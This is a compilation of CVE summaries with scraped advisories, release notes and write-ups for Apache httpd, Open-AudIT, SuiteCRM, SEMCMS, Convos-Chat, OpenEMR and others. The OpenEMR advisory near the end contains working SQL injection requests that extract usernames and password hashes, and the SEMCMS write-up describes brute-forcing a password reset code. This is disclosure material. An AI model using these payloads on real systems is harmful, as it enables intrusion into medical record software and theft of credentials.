A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the vulnerabilty though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier.

CVE-2021-44790: Apache HTTP Server 2.4 vulnerabilities

Opmantek Open-AudIT Community 4.2.0 (Fixed in 4.3.0) is affected by a Cross Site Scripting (XSS) vulnerability. If a bad value is passed to the routine via a URL, malicious JavaScript code can be executed in the victim's browser.

Released 2021-12-01  

Linux SHA256 - 4c27c60e1f6ea96bbdf5a7f21fbc9d80ca2e2991091215d481fc1c6c60e3fc9a

Linux MD5 - 454316502bf423faa2336f8f5ad7f133

This release of Open-AudIT was bought forward because of the disclosure of two vulnerabilities.

This release fixes these issues.

The details of each can be found at:

*   Errata - 4.2.0 and earlier Javascript vulnerability
*   Errata - 4.2.0, 3.5.0 and onwards util function vulnerability

Version

Type

Collection

Description

Professional

Bug

Integrations

When multiple integrations are configured, multiple identical attributes would appear in the integrations details on the device details page.

Professional

New Feature

Discoveries

Retrieve and display installed certificates on Linux. Both system wide and Apache specific.

Professional

New Feature

Discoveries

Retrieve and display USB connected devices (exclude bluetooth on Windows).

Professional

Improvement

Queries

Add Query Details button to Query Execute template.

Community

Improvement

Discoveries

There was an issue with PHP's SNMPv3 implementation. This is resolved for Linux where we now use net-snmp for initial credential testing. For Windows we cannot do this so the caveat is that where SNMPv3 is used, you must _**not**_ have multiple credential sets (for SNMPv3) with _**identical security names**_.

Professional

Improvement

Licenses

Add a license expiry date to /licenses entries.

Professional

Improvement

Discoveries

Provide a list of discovery issues with hints to how to resolve them.

Professional

Bug

Discoveries

Fix Active Directory discovery type option. AD discoveries now work again.

Professional

Bug

Integrations

Fix integrations fields for bool\_one\_zero and bool\_y\_n always staying 'false'.

Professional

Improvement

Devices

Provide an indication on the Devices List screen to indicate level of audit performed.

Community

Bug

Util

Filter out all characters except those in the allowed list for determining number of IPs in range or subnet for util::subnet\_size. See Errata - 4.2.0, 3.5.0 and onwards util function vulnerability

Community

Bug

All

Fix link creation to exclude user input. See Errata - 4.2.0 and earlier Javascript vulnerability

Community

Improvement

All

For spawning processes, no longer use the execute script with a URL, now call PHP directly. No longer a requirement for http to be available from localhost.

Community

Improvement

Util

Allow downloading test\_windows\_client.vbs using the web interface at util/test\_windows\_client.

Community

Improvement

Audit

Improvements to test\_windows\_client.vbs:

*   checks for RPC and NetLogon services
*   OS architecture

Community

Improvement

Discoveries

Fix audit\_linux.sh to allow running on BusyBox.

Enterprise

Improvement

Clouds

Delete the associated discovery when we delete the cloud.

Community

Improvement

Discoveries

Update the MAC -> Manufacturer helper with more manufacturers.

Community

Improvement

Discoveries

Add Fortinet Fortigate models to SNMP Model Helper.

Community

Improvement

Discoveries

Detect Quest InTrust Agent in audit\_linux.sh.

Community

Bug

Devices

Fix for image upload path traversal issue.

Community

Improvement

Devices

Automatically add to filter for oae\_manage if request from Open-AudIT Enterprise on devices collection.

Community

Bug

Devices

Fix running multiple device discoveries from the Bulk Edit screen.

Community

Improvement

Discoveries

Make all command line calls from Linux (winexe, smbclient) use a credentials file, rather than put the credentials on the command line. All work in wmi\_helper.

Community

Improvement

All

Update JS libraries for: jQuery Tablesorter, Bootstrap Table, Bootstrap FileStyle, Chartist.

Community

Improvement

Discoveries

More robust scp transfer test for success in ssh\_helper.

Community

Improvement

Rules

Improve discovery logging in m\_rules::execute.

Enterprise

Improvement

Collectors

When creating a discovery on a collector, include blank command\_options and remove options so we're SQL Strict compliant.

Professional

Improvement

Discoveries

Ensure the discovery export function retrieves all discovery logs.

Professional

Bug

Devices

Fix broken edit fields for Opmantek Details on devices read template for custom fields.

Professional

Improvement

All

Upgrade JS libraries for dataTables and HighCharts.

Professional

Improvement

Devices

On device details, only show discovery issues for the latest discovery.

CVE-2021-44916: Release Notes for Open-AudIT v4.3.0 - Open-AudIT

Chain Sea ai chatbot backend has improper filtering of special characters in URL parameters, which allows a remote attacker to perform JavaScript injection for XSS (reflected Cross-site scripting) attack without authentication.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202112005

CVE ID

CVE-2021-44163

CVSS

6.1 (Medium)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

影響產品

聯繫程曦資訊詢問受影響版本

問題描述

文字客服系統後台因網址參數未過濾特殊字元，遠端攻擊者不須登入，即可注入JavaScript語法進行攻擊，進行反射型XSS (Reflected Cross-site scripting)攻擊。

解決方法

聯繫程曦資訊進行版本更新

漏洞通報者

ZUSO ART (ART@zuso.ai)

公開日期

2021-12-17

CVE-2021-44163: 程曦資訊整合 文字客服 - Reflected XSS

SuiteCRM before 7.12.2 and 8.x before 8.0.1 allows authenticated SQL injection.

CVE-2021-45041: 8.0 Releases

SICK SOPAS ET before version 4.8.0 allows attackers to manipulate the command line arguments to pass in any value to the Emulator executable.

**Reporting a vulnerability**

The SICK PSIRT aims to process every vulnerability with confidentiality and professionalism together with the respective reporters. Neither a non-disclosure agreement (NDA) nor another type of contract is necessary or a requirement for collaboration.

Coordinated vulnerability reports from all members of the security community are greatly appreciated. These include security researchers, universities, CERTs, business partners, authorities, industry associations and suppliers.

Many SICK AG products fulfill important protective functions and are used in critical infrastructures. SICK AG therefore asks for cooperation when dealing with the coordinated disclosure of vulnerabilities and also requests that vulnerability information not be disclosed prematurely.

SICK AG requests that as much information as possible is provided in a report in order to speed up processing. This information should contain the following:

*   **Contact information and availability**
*   **Affected product including model and version number**
*   **Classification of the vulnerability** (buffer overflow, XSS, …)
*   **Detailed description of the vulnerability** (with verification if possible)
*   **Effect of the vulnerability** (if know)
*   **Current level of awareness of the vulnerability** (are there plans to disclose it?)
*   **(Company) affiliation of the reporter** (if reporter is prepared to provide such information)
*   **CVSS score** (if known)

If more information is necessary for the inspection of a vulnerability, the SICK PSIRT will contact the reporter.

If the reporter would like, he/she will be publicly acknowledged after disclosing a new vulnerability.

CVE-2021-32499: The SICK Product Security Incident Response Team (SICK PSIRT)

A vulnerability in /include/web_check.php of SEMCMS v3.8 allows attackers to reset the Administrator account's password.

Permalink

Cannot retrieve contributors at this time

**Background administrator password reset vulnerability**

**vuln in /include/web\_check.php**

![a](https://github.com/cve-vul/vul/raw/master/SEMCMS/a.png)

**In line 54 of the file, three variables are Judge whether it is empty; test\_input and verify\_str are keywords to detect whether the string has SQL and XSS. Let's ignore it here.**

**In line 60 of the file**

    $query=$db_conn->query("select * from sc_user where user_email='".$umail."' and user_rzm='".$urzm."'");
    

**The validity of $umail and $urzm is verified by database queries.Moreover, $urzm is generated by the random number Rand (10,10000).** ![d](https://github.com/cve-vul/vul/raw/master/SEMCMS/d.png) **And updated to the database in line 29**

![e](https://github.com/cve-vul/vul/raw/master/SEMCMS/e.png) **Finally, the verification code is obtained by direct blasting with burp tool**

CVE-2020-18078: vul/back_password_reset.md at master · cve-vul/vul

A Stored Cross Site Scripting (XSS) issue exists in Convos-Chat before 6.32.

Greeting Everyone !

Today In This Blog we will Explore XSS attack vector, Which Is Possible through SVG file Upload Functionality Due To Improper Validation Of file it got Executed to the Backend Server .

**Description**

Chat component was found vulnerable to unrestricted file upload and any malicious JavaScript execution can be performed. Stored cross-site scripting arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.

**Impact**

This allow an attacker to steal user session ,account takeover ,redirect user to attacker controlled site Javascript execution leads to multiple possible attack scenarios.

**Proof Of Concept**

Step 1: Download the package/product from github repository https://github.com/convos-chat/convos and configure on localhost as per instruction.  
Step 2: Login into the application with valid credentials.  
Step 3: Navigate to chat and upload a svg file via upload functionality with below malicious JavaScript payload in it.  
Step 4: Once the file is uploaded click on generated link to access the file and observe the uploaded file and JavaScript payload execution.

**Which End Point Are Vulnerable**

1.Profile Picture Upload  
2.File Upload On Another Functionality  
3.File Upload through Comment Section

1.Ensure that the file’s content is validated properly and input sanitization is performed.  
2.Make sure a strict check against file extensions is implemented and a whitelisted is used to allow only required filetypes.  
3.Make sure that the file size limit is properly validated and large files are not processed by the application.  
4.Ensure that the injection points such as filename parameters are properly validated and sanitized in order to prevent client-side and server-side injection attacks.

**Reference Links**

Product url: https://github.com/convos-chat/convos  
Report: https://github.com/convos-chat/convos/issues/623  
Released Fix: https://github.com/convos-chat/convos/commit/14a3b1e98cd1a3211c0ef3d4f5ffdbc60baaca54

CVE-2021-42584: Cross Site Scripting - Stored through crafted SVG file in Convos-Chat before 6.32

Wechat-php-sdk v1.10.2 is affected by a Cross Site Scripting (XSS) vulnerability in Wechat.php.

CVE-2021-43678: GitHub - gaoming13/wechat-php-sdk: 微信公众平台php版开发包

In the TransformXML processor of Apache NiFi before 1.15.1 an authenticated user could configure an XSLT file which, if it included malicious external entity calls, may reveal sensitive information.

CVE-2021-44145: Apache NiFi Security Reports

An authenticated SQL injection issue in the calendar search function of OpenEMR 6.0.0 before patch 3 allows an attacker to read data from all tables of the database via the parameter provider_id, as demonstrated by the /interface/main/calendar/index.php?module=PostCalendar&func=search URI.

`# Trovent Security Advisory 2109-01 #   #####################################  Authenticated SQL injection in OpenEMR calendar search   ######################################################  Overview   ########  Advisory ID: TRSA-2109-01   Advisory version: 1.0   Advisory status: Public   Advisory URL: https://trovent.io/security-advisory-2109-01   Affected product: OpenEMR web application   Tested versions: 6.0.0, 6.1.0-dev   Vendor: OpenEMR project, https://www.open-emr.org   Credits: Trovent Security GmbH, Stefan Pietsch  Detailed description   ####################  The OpenEMR web application is a medical practice management software and can   be used to store electronic medical records.   Trovent Security GmbH discovered an SQL injection vulnerability in the search   function of the calendar module. The parameter 'provider_id' is injectable.   The attacker needs a valid user account to access the calendar module of the   web application. It is possible to read data from all tables of the database.  Severity: Medium   CVSS Score: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)   CWE ID: CWE-89   CVE ID: CVE-2021-41843  Proof of concept   ################  (1) HTTP request to read a username from the database table 'openemr.users_secure':   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  POST /interface/main/calendar/index.php?module=PostCalendar&func=search HTTP/1.1   Content-Length: 324   Host: 172.18.0.3   Content-Type: application/x-www-form-urlencoded   Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q   Connection: close  pc_keywords=TRVNT&pc_keywords_andor=AND&pc_category=&start=09%2F16%2F2021&end=09%2F23%2F2021&   provider_id=%28UPDATEXML%281%2CCONCAT%280x2e%2C0x20%2C%28SELECT%20MID%28%28IFNULL%28CAST%28username   %20AS%20NCHAR%29%2C0x20%29%29%2C1%2C22%29%20FROM%20openemr.users_secure%20ORDER%20BY%20id%29%29%2C1%29%29&pc_facility=&submit=Submit  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  (2) HTTP response to (1):   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  HTTP/1.1 200 OK   Date: Fri, 17 Sep 2021 07:26:48 GMT   Server: Apache   Expires: Thu, 19 Nov 1981 08:52:00 GMT   Cache-Control: no-store, no-cache, must-revalidate   Pragma: no-cache   Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; expires=Fri, 17-Sep-2021 15:13:28 GMT; Max-Age=28000; path=/; SameSite=Strict   Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; expires=Fri, 17-Sep-2021 15:13:29 GMT; Max-Age=28000; path=/; SameSite=Strict   Strict-Transport-Security: max-age=31536000; includeSubDomains; preload   X-XSS-Protection: 1; mode=block   Content-Length: 27   Connection: close   Content-Type: text/html; charset=utf-8  XPATH syntax error: 'admin'  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  (3) HTTP request to read a password hash from the database table 'openemr.users_secure':   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  POST /interface/main/calendar/index.php?module=PostCalendar&func=search HTTP/1.1   Content-Length: 324   Host: 172.18.0.3   Content-Type: application/x-www-form-urlencoded   Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q   Connection: close  pc_keywords=TRVNT&pc_keywords_andor=AND&pc_category=&start=09%2F16%2F2021&end=09%2F23%2F2021&   provider_id=%28UPDATEXML%281%2CCONCAT%280x2e%2C0x20%2C%28SELECT%20MID%28%28IFNULL%28CAST%28password   %20AS%20NCHAR%29%2C0x20%29%29%2C1%2C22%29%20FROM%20openemr.users_secure%20ORDER%20BY%20id%29%29%2C1%29%29&pc_facility=&submit=Submit  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  (4) HTTP response to (3):   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  HTTP/1.1 200 OK   Date: Fri, 17 Sep 2021 07:27:29 GMT   Server: Apache   Expires: Thu, 19 Nov 1981 08:52:00 GMT   Cache-Control: no-store, no-cache, must-revalidate   Pragma: no-cache   Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; expires=Fri, 17-Sep-2021 15:14:09 GMT; Max-Age=28000; path=/; SameSite=Strict   Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; expires=Fri, 17-Sep-2021 15:14:09 GMT; Max-Age=28000; path=/; SameSite=Strict   Strict-Transport-Security: max-age=31536000; includeSubDomains; preload   X-XSS-Protection: 1; mode=block   Content-Length: 44   Connection: close   Content-Type: text/html; charset=utf-8  XPATH syntax error: '$2y$10$ukudH2lRSW2vKX.'  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  Solution / Workaround   #####################  Limit access to the calendar search function until the vulnerability is fixed.  Fixed in OpenEMR version 6.0.0 patch 3, verified by Trovent.  History   #######  2021-09-16: Vulnerability found   2021-09-29: Advisory created & vendor contacted   2021-09-30: Vendor acknowledged vulnerability, CVE ID requested   2021-10-01: CVE ID received   2021-10-19: Vendor releases OpenEMR version 6.0.0 patch 3   2021-12-14: Add information about fixed version   2021-12-15: Advisory published  `

Tag

#xss